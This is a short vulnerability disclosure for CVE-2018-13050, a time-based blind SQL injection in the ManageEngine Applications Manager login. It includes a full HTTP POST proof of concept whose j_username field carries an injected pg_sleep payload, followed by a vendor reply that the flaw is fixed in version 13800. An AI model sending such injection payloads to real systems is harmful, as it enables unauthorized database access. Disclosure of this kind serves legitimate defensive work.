[CVE-2018-13050]Zoho manageengine Applications Manager SQL Injection vulnerability

[x-f1v3]

Zoho manageengine Applications Manager SQL Injection vulnerability

Date: 2018/07/02
Software Link: https://www.manageengine.com/products/applications_manager/download.html
Category: Web Application
Exploit Author: jacky xing From DBAppSecurity
Exploit Author's Email: jacky.xing@dbappsecurity.com.cn
CVE: CVE-2018-13050

Proof of Concept:

POST /j_security_check HTTP/1.1
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1:9090/
Cookie: JSESSIONID_APM_9090=CFE9FA9A1A9EF400DC88681BF3F580F4; testcookie=; am_username=; am_check=
Host: 127.0.0.1:9090
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

submit=Login&clienttype=html&j_password=g00dPa%24%24w0rD&j_username=5mwETOWO';select%20pg_sleep(0);%20--%20&remember=on&ScreenHeight=709&ScreenWidth=1280&username=rrkfpycm&webstart=

This is a time-based blind SQL Injection vulnerability .So I use sqlmap to exploit it .The following is a proof screenshot.

Databases:

User:

Table:

data:

[Priyankaroy93]

We apologise for the inconvenience this may have caused to our customers.
These issues were fixed in July itself, with the release of version 13800. Please upgrade to the latest version from here: http://bit.ly/APMDownload

ManageEngine